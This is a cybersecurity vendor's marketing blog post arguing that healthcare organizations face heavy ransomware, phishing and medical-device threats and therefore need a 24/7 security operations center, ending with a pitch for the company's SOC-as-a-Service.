<img height="1" width="1" style="display:none;" alt="" src="https://px.ads.linkedin.com/collect/?pid=2659386&amp;fmt=gif">
Talk to an expert
Cysiv Blog

Five Reasons Every Healthcare Organization Needs a 24/7 Security Operations Center

Back to Blog

Healthcare organizations have long been a key target for both financially motivated attackers and cyber espionage campaigns. They continue to be a major target, and they continue to pay the price. According to the 2020 Verizon Data Breach Investigations Report, the number of confirmed data breaches against healthcare targets was up 71% over the previous year. And, according to a 2019 Ponemon Institute report, data breaches cost healthcare companies an average of $6.5 million.

Part of the allure comes from the high-value data, such as personally identifiable information, including medical records, and payment data, the healthcare industry holds to complete their work. Attackers are also drawn to healthcare targets because of the immediacy of the services they provide. Disruptive and destructive threats, like ransomware, threaten to slow down operations. Attackers target healthcare businesses since the need for uptime and quick response when lives are on the line is more critical than in many other industries, leading victims to accede to their demands for ransom. Ransomware attacks against healthcare businesses have always been an issue, but spiked in late 2019 and have remained high through the first half of 2020. 


Attackers also hone in on healthcare targets because of their sprawling attack surfaces. Between workstations, servers, mobile devices, point-of-sale systems, and internet-enabled medical devices, they have a broad range of devices to investigate, identify vulnerable or insecurely configured devices, and use as a way into the network. The sheer number of devices also makes healthcare an appealing sector for cryptominers and other botnet attacks. Internet-enabled medical devices, in particular, expand that attack surface. And, it’s not just cutting-edge attacks: according to a 2020 report from Palo Alto Networks, 83% of medical imaging devices are running unsupported operating systems, leading to a resurgence of older attacks like the decade-old Conficker worm.

The healthcare industry’s unique cybersecurity challenges make 24/7 monitoring and response critical. Attaining that level of oversight is where a round-the-clock, well-staffed security operations center comes into play.

Key Vulnerabilities Targeted in Healthcare Attacks

Threat actors target a wide range of vulnerabilities in order to access systems and data in healthcare environments.

Some threat actors gain access via outdated software, including unpatched JBoss instances, remote desktop clients, and FTP clients. Sometimes, it’s not a question of out-of-date software, but rather insecurely configured systems. Many spyware and ransomware programs get onto systems because Microsoft Office is configured to allow macros; users can download a file, follow a lure that convinces them to enable content in order to display a document properly, and the enabled content is a script that downloads malware. Malware can also spread to machines via malicious JavaScript or Flash files on websites.

Attackers also target insecure medical devices. Though more and more medical devices are being designed with network capabilities, many are not designed with security in mind. Though the devices themselves may not store the data the attackers seek, they can be easy entry points for the network, and attackers can pivot from a vulnerable device to other, higher-value targets on the network.

Threat actors are running phishing campaigns with lures such as new information about COVID-19, offers of personal protective equipment, and fake shipping information for ventilators.

In addition to technical vulnerabilities, attackers go beyond technical flaws and attack the human element. Threat actors commonly create phishing and spearphishing attacks to target healthcare companies in order to gain network access. This has been a specific problem during the pandemic. Threat actors are running phishing campaigns with lures such as new information about COVID-19, offers of personal protective equipment, and fake shipping information for ventilators. There are also known attacks against mobile devices that use pandemic-related lures. For example, attackers built a fake version of a COVID-19 tracking map that had an information stealer and a downloader built into it. Those phishing campaigns can lead to either credential theft or the installation of ransomware or spyware on company machines.

In the current climate, attackers are also taking advantage of broader work-from-home policies in the medical sector. According to a joint advisory, the United States Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency and the United Kingdom National Cyber Security Centre have identified APT groups who have specifically targeted vulnerabilities in remote work software: specifically Citrix, as well as VPN products from Pulse Secure, Fortinet, and Palo Alto.

Cybersecurity Challenges in Healthcare

As a healthcare provider, you know the importance of keeping systems online and patient data secure. This requires not only knowing what the threat landscape looks like, but actively defending your systems and data against both internal and external threats.

Doing so is a challenge. It requires tracking a wide range of assets, from workstations to servers to mobile devices to point-of-sale systems to medical devices, often located in different locations. It involves patching these devices in a timely manner, ensuring the configurations follow security best practices, and appropriately controlling access to the devices. Finally, it requires being able to see how every device on the network is functioning at every moment in time in order to identify anomalous or suspicious activity and prevent a breach.

The Case for a 24/7 SOC in Healthcare

Cysiv Healthcare BlogGiven the broad range of vectors for attacks against the healthcare sector, and how attractive the healthcare sector continues to be for both financially motivated attackers and cyber espionage groups, it is imperative that healthcare businesses put in the work to strengthen their security posture. A 24/7 SOC is now the baseline for any mature security program:

  • Knowing What’s Normal Helps You  Know What’s Abnormal:  In order to detect suspicious activity, your business needs a baseline. A 24/7 SOC with experienced cybersecurity staff can make sense of network traffic, events, and alerts. Once the SOC knows what is normal in the network, it can more quickly identify anomalies and foil attackers.
  • Identify Rogue Activity Quickly: If an attacker gets on the network or a machine becomes infected with malware, a 24/7 SOC will allow that rogue activity to be identified as quickly as possible. Speedy incident response can minimize the effects and costs of a breach.
  • Uptime Matters:  When someone’s health is on the line, every second matters.  Attackers know this, and target the healthcare industry with disruptive and destructive threats. With a 24/7 SOC, a healthcare business can identify threats more quickly, which leads to systems staying online and data remaining accessible by those who need it to provide care, without having to restore from backups or pay a ransom.
  • Coordinated Response:  Part of the difficulty of securing a healthcare business involves being able to see and respond to issues at multiple medical offices. That has become even more difficult during the COVID-19 pandemic as more medical staff has had to work from home. However, a SOC that is taking in and analyzing data from all machines with access to corporate data will put the company in the best position to understand.
  • Expert Analysis:  A 24/7 SOC staffed with experienced security, threat, data science, and incident response professionals allows a healthcare business to analyze the network on an ongoing basis, identify anomalies, and hunt for and respond to threats. Few healthcare organizations have the time or resources to recruit and train an expert 24/7 SOC staff; as an alternative, it makes sense to consider an industry-leading SOC-as-a-Service solution, like Cysiv, in order to experience the ongoing benefits of a 24/7 SOC without the expense and challenges of building it from scratch.

SOC-as-a-Service: Better Medicine

A 24/7 SOC is an essential line of defense, but building and scaling one from scratch requires time, capital, and expertise that puts it beyond the reach of all but the largest healthcare businesses. However, an industry-leading 24/7 SOC is still within reach of healthcare organizations of all sizes. Cysiv SOC-as-a-Service not only offers all the ongoing security benefits of a best-in-class SOC, but it also makes implementing and scaling it easier and more cost-effective than ever. Cysiv's cloud-native, co-managed, next-gen SIEM, our security, threat, IR, and data science professionals that complement and collaborate with your team, and pay-as-you consumption-based monthly billing are just what the doctor ordered.

To learn more about active cybersecurity threats against the healthcare industry, and how your business can strengthen its defenses with SOC-as-a-Service, download our Healthcare Threat Report.